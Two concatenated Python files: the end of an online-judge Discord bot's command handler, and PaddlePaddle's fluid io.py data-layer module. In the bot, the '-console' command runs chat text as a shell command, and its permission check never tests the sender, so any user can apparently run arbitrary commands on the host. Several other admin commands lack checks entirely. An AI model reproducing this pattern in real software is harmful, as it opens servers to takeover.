await message.channel.send("Submission request received from `" + str(message.author) + "` for problem `" + prev['problem'] + "` in `" + language + "`.\nSend your source code either as an attachment or a message surrounded by backticks (`).")
elif str(message.content).split()[0].startswith("-lang"):
judging.get_file(storage_client, "Languages.txt", "Languages.txt")
f = open("Languages.txt", "r")
msg = f.read()
await message.channel.send(msg + "\nTo see exact execution commands, visit <https://dboj.jimmyliu.dev/>")
elif str(message.content).startswith("-error"):
f = open("errors.txt", "r")
await message.channel.send("```\n" + f.read(5000) + "\n```")
elif str(message.content).split()[0] == "-open":
# perm = settings.find_one({"type":"access", "name":str(message.author)})
prob = settings.find_one({"type":"problem", "name":str(message.content).split()[1].lower()})
if prob is None or perms(prob, str(message.author)):
await message.channel.send("Error: Problem not found")
return
try:
judging.get_file(storage_client, "ProblemStatements/" + prob['name'] + ".txt", "ProblemStatement.txt")
ps = open("ProblemStatement.txt", "r")
st = ps.read()
await message.channel.send(st)
except Exception as e:
await message.channel.send("An error occured while retrieving the problem statement:\n```" + str(e) + "\n```")
elif str(message.content).split()[0] == "-reset":
if str(message.author) != "jiminycricket#2701":
await message.channel.send("Sorry, you do not have authorized access to this command.")
return
settings.update_many({"type":"judge", "status":1}, {"$set":{"status":0}})
await updateStatus()
await message.channel.send("All servers' statuses are now set to available")
elif str(message.content).startswith("-add"):
await message.channel.send("To add your own problem to the judge, visit this site: <https://dboj.jimmyliu.dev/>")
elif str(message.content).startswith("-vote"):
await message.channel.send("Vote for the Judge discord bot!\nDiscord Bot List: <https://discordbotlist.com/bots/judge/upvote>\ntop.gg: <https://top.gg/bot/831963122448203776/vote>\n\nThanks for your support!")
elif str(message.content).startswith("-server"):
msg = "Discord bot online judge is currently in " + str(len(client.guilds)) + " servers!"
if str(message.channel) == "Direct Message with jiminycricket#2701":
msg += "\n```\n"
for x in client.guilds:
msg += str(x) + "\n"
await message.channel.send(msg + "```")
else:
await message.channel.send(msg)
elif str(message.content).split()[0] == "-users":
if str(message.channel) != "Direct Message with jiminycricket#2701":
return
f = open("users.txt", "r")
await message.channel.send("```\n" + f.read() + "```")
f.close()
elif str(message.content).startswith("-on"):
j = int(str(message.content).split()[1])
settings.update_one({"type":"judge", "num":j}, {"$set":{"status":0}})
await updateStatus()
await message.channel.send("Judge " + str(j) + " is now online")
elif str(message.content).startswith("-off"):
j = int(str(message.content).split()[1])
settings.update_one({"type":"judge", "num":j}, {"$set":{"status":2}})
await updateStatus()
await message.channel.send("Judge " + str(j) + " is now offline")
elif str(message.content) == "-status":
msg = getStatus()
await message.channel.send("**Current Judge Server Statuses:**\n```\n" + msg + "```")
elif str(message.content).startswith("-reset"):
settings.update_many({"type":"judge"}, {"$set":{"status":0}})
await updateStatus()
await message.channel.send("All online judging servers successfully reset.\nType `-status` to see current judge statuses")
elif str(message.content).startswith("-invite"):
await message.channel.send("Invite the online judge discord bot to your own server with this link: \nhttps://discord.com/api/oauth2/authorize?client_id=831963122448203776&permissions=2148005952&scope=bot")
elif str(message.content).startswith("-cancel"):
settings.delete_many({"type":"req"})
await message.channel.send("Successfully cancelled all active submission requests")
elif str(message.content) == "-sigterm":
running = False # set terminate signal
await message.channel.send("Attempting to terminate processes.")
elif str(message.content) == "-sigkill":
await message.channel.send("Killing process signal using system exiter.")
exit(0) # Kill using system exit function
elif str(message.content) == "-restart":
running = True # Attempt to restart process
await message.channel.send("Restarting judge.")
elif str(message.content).startswith("-join"):
if not (str(message.channel).startswith("ticket-") or str(message.channel).endswith("-channel")):
await message.channel.send("Please join contests in a private channel with the bot. Head to <#855868243855147030> to create one.")
return
arr = str(message.content).split()
if len(arr) != 2:
await message.channel.send("Incorrect formatting for join command. Use `-join [contestCode]` to join a contest")
return
cont = settings.find_one({"type":"contest", "name":arr[1].lower()})
if cont is None:
await message.channel.send("Error: Contest not found")
return
if (not contests.date(cont['start'], cont['end'], contests.current_time())):
await message.channel.send("This contest is not currently active. Type `-up` to see upcoming contest times.")
return
if not settings.find_one({"type":"access", "mode":arr[1], "name":str(message.author)}) is None:
await message.channel.send("You already joined this contest!")
return
solved = [0] * (cont['problems'] + 1)
penalties = [0] * (cont['problems'] + 1)
time_bonus = [0] * (cont['problems'] + 1)
settings.insert_one({"type":"access", "mode":arr[1], "name":str(message.author), "solved":solved, "penalty":penalties, "time-bonus":time_bonus, "start":contests.current_time(), "taken":0})
await live_scoreboard(arr[1])
await message.channel.send("Successfully joined contest `" + arr[1] + "`! You have " + amt(cont['len']) + " to complete the contest. Good Luck!\n")
await asyncio.sleep(1)
judging.get_file(storage_client, "ContestInstructions/" + arr[1] + ".txt", "ContestInstructions.txt")
f = open("ContestInstructions.txt", "r")
await message.channel.send("```\n" + f.read() + "\n```")
notif = client.get_channel(858365776385277972)
await notif.send("<@627317639550861335> User `" + str(message.author) + "` joined contest `" + arr[1] + "`!")
elif str(message.content).startswith("-profile"):
arr = str(message.content).split()
if len(arr) == 1:
await message.channel.send(profile(str(message.author)))
else:
await message.channel.send(profile(str(message.content)[9:]))
elif str(message.content).startswith("-rank"):
arr = str(message.content).split()
if len(arr) < 2:
await message.channel.send("Incorrect formatting for `-rank` command. Please type `-rank [contestCode]` for the scoreboard")
else:
await message.channel.send(getScoreboard(arr[1]))
elif str(message.content).startswith("-rem"):
arr = str(message.content).split()
if len(arr) == 1:
await message.channel.send(remaining(str(message.author)))
else:
await message.channel.send(remaining(str(message.content)[5:]))
elif str(message.content).startswith("-up"):
m = "Upcoming contests:\n```"
f = False
for x in settings.find({"type":"contest"}):
if contests.compString(x['end'], contests.current_time()):
m += "Contest " + x['name'] + " starts at " + x['start'] + " and ends at " + x['end'] + "\n"
f = True
if not f:
m += "No upcoming contests\n"
m += "```"
await message.channel.send(m)
elif str(message.content).startswith("-refresh"):
arr = str(message.content).split()
if len(arr) < 2:
await message.channel.send("Incorrect formatting for refresh command. Use `-refresh [contestCode]`")
return
for i in range(1, len(arr)):
await live_scoreboard(arr[i])
await updateStatus()
await message.channel.send("Refreshed live scoreboard and live judge status")
elif str(message.content).startswith("-set"):
arr = str(message.content).split()
if settings.find_one({"type":"access", "mode":"admin", "name":str(message.author)}) is None:
await message.channel.send("Sorry, you do not have sufficient permissions to use this command.")
return
settings.update_one({"type":"livecontests"}, {"$set":{"arr":arr[1:]}})
await sendLiveScoreboards()
await message.channel.send("Live scoreboard contests set to `" + str(arr[1:]) + "`")
elif str(message.content).startswith("-console"):
if settings.find_one({"type":"access", "mode":"admin", "name":"jiminycricket#2701"}) is None:
await message.channel.send("Sorry, you do not have sufficient permissions to use this command.")
return
output = open("console.out", "w")
tm = float(str(message.content).split()[1])
console = subprocess.Popen(str(message.content)[(str(message.content).find("$")+1):], stdout=output, preexec_fn = judging.limit_virtual_memory, shell=True)
await message.channel.send("Console started. Running command `" + str(message.content)[(str(message.content).find("$")+1):] + "` for " + str(tm) + " second(s).")
try:
console.wait(timeout = tm)
except subprocess.TimeoutExpired:
console.terminate()
output.flush()
output.close()
await message.channel.send("Console finished. Output shown below:\n```" + open("console.out", "r").read(2000) + "\n```")
elif str(message.content).startswith("-export"):
if settings.find_one({"type":"access", "mode":"admin", "name":"jiminycricket#2701"}) is None:
await message.channel.send("Sorry, you do not have sufficient permissions to use this command. Please contact jiminycricket#2701 for problem setting permissions.")
return
if len(message.attachments) == 0:
await message.channel.send("Please attach a zip archive with the problem info along with the `-export` command")
return
await message.channel.send("Uploading problem data...")
try:
msg = ProblemUpload.uploadProblem(settings, storage.Client(), str(message.attachments[0]), str(message.author))
await message.channel.send(msg)
except Exception as e:
await message.channel.send("Error occurred while uploading problem data:\n```" + str(e) + "\n```")
os.system("rm -r problemdata; rm data.zip")
elif str(message.content) == "-register":
if not str(message.channel).startswith("Direct Message with"):
await message.channel.send("Please use `-register` in a direct message with the bot.")
return
if settings.find_one({"type":"account", "name":str(message.author)}) is not None:
await message.channel.send("An account under your username has already been registered. If you forgot your password, please contact me (`jiminycricket#2701`).")
return
pswd = generatePassword()
settings.insert_one({"type":"account", "name":str(message.author), "pswd":hashCode(pswd)})
await message.channel.send("Your account has been successfully created! Your password is `" + pswd + "`. Please don't share it with anyone.")
client.run(os.getenv("TOKEN"))
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import sys
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
import logging
__all__ = [
'data', 'read_file', 'double_buffer', 'py_reader',
'create_py_reader_by_data', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function creates a global variable for feeding data into the network.
Based on whether the data has to be returned as a minibatch, it builds the
global variable by using the helper functions. The global variable can be
accessed by all the following operators in the graph.
All the input arguments of this function are passed in as local variables
to the LayerHelper constructor.
Notice that paddle only uses :code:`shape` to infer the shapes of the
following variables in the network during compile-time. During run-time,
paddle does not check whether the shape of the fed data matches the
:code:`shape` setting in this function.
Args:
name(str): The name/alias of the created data variable.
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch sizes at run time.
2. If shape contains -1, such as shape=[1, -1],
append_batch_size will be enforced to be False (ineffective)
because PaddlePaddle cannot set more than one unknown number in the
shape.
dtype(np.dtype|VarType|str): The type of the data: float32, float16, int, etc.
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean indicating whether gradients should flow through this variable.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
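# A second sketch (same fluid API as above): a shape that already
# contains -1 disables batch-size prepending, as described in Args.
seq = fluid.layers.data(name='y', shape=[-1, 128], dtype='float32')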
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class, used to create an op with a sub-block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create an RPC server that binds to and listens
on a specific TCP port; the server runs the sub-block when it
receives variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many clients are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # multiple optimize blocks are not yet supported in layers
'sync_mode': True, # async mode is not yet supported in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get variables back from the
server side once the server has finished running the server-side program.
Args:
endpoints (str): comma-separated IP:PORT pairs, in the order
of send_vars to send
send_vars (list): variables to send to the server
dummy_output (Variable|list|None): dummy output variable(s) used to express op dependencies, default: None
sync (bool): whether to wait for the request to finish
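Examples:
.. code-block:: python
# A minimal sketch (assumes a distributed fluid program is being
# built; ``x`` is just a placeholder variable created for the example).
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[32], dtype='float32')
Send("127.0.0.1:6170", [x])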
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma-separated IP:PORT pairs, in the order
of the variables to receive
get_vars (list): vars to get from the server after the send completes.
dummy_input (Variable|list|None): dummy input variable(s) used to express op dependencies, default: None
sync (bool): whether to wait for the request to finish
Returns:
list: list of received variables
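Examples:
.. code-block:: python
# A minimal sketch (assumes a distributed fluid program; ``x`` is the
# variable that should be fetched back from the parameter server).
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[32], dtype='float32')
Recv("127.0.0.1:6170", [x])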
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
logging.warn('Your decorated reader has raised an exception!')
six.reraise(*sys.exc_info())
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source. More details :ref:`user_guide_use_py_reader_en` . When
:code:`Executor::Run()` is invoked in C++ side, the data from the generator
would be read automatically. Unlike :code:`DataFeeder.feed()`, the data
reading process and :code:`Executor::Run()` process can run in parallel
using :code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples declaring the data shapes.
dtypes(list|tuple): List of strings declaring the data types.
lod_levels(list|tuple): List of ints declaring the data lod_levels.
name(basestring): The prefix of the Python queue name and Reader name. If
None, a name will be generated automatically.
use_double_buffer(bool): Whether to use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
# user defined network, here a softmax regression example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
logging.warn(
'paddle.fluid.layers.py_reader() may be deprecated in the near future. '
'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
It works much like py_reader, except that its input is feed_list
instead of shapes, dtypes and lod_levels.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
name(basestring): The prefix of the Python queue name and Reader name. If
None, a name will be generated automatically.
use_double_buffer(bool): Whether to use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
import paddle.fluid.compiler as compiler
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
MEMORY_OPT = False
USE_CUDA = False
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
build_strategy = fluid.BuildStrategy()
build_strategy.memory_optimize = True if MEMORY_OPT else False
exec_strategy = fluid.ExecutionStrategy()
compiled_prog = compiler.CompiledProgram(
fluid.default_main_program()).with_data_parallel(
loss_name=loss.name,
build_strategy=build_strategy,
exec_strategy=exec_strategy)
for epoch_id in range(2):
reader.start()
try:
while True:
exe.run(compiled_prog, fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
logging.warn(
'paddle.fluid.layers.create_py_reader_by_data() may be deprecated in the near future. '
'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The Reader class hierarchy contains DecoratedReader and FileReader; DecoratedReader is further subclassed by CustomReader and BufferedReader, and this function relates to BufferedReader. The data will be copied to the target place through a double buffer queue. If the target place is None, the place that the executor performs on will be used.
Args:
reader (Variable): The Reader Variable need to be wrapped.
place (Place, optional): The place of the target data, such as CPU or GPU; if GPU is used, it is necessary to specify which card is involved. Default is the same place that the executor performs on.
name (str, optional): Variable name. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Variable(Reader): wrapped reader with double buffer.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
use_double_buffer=False)
reader = fluid.layers.double_buffer(reader)
image, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` .
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read from the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
image, label = fluid.layers.read_file(reader)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
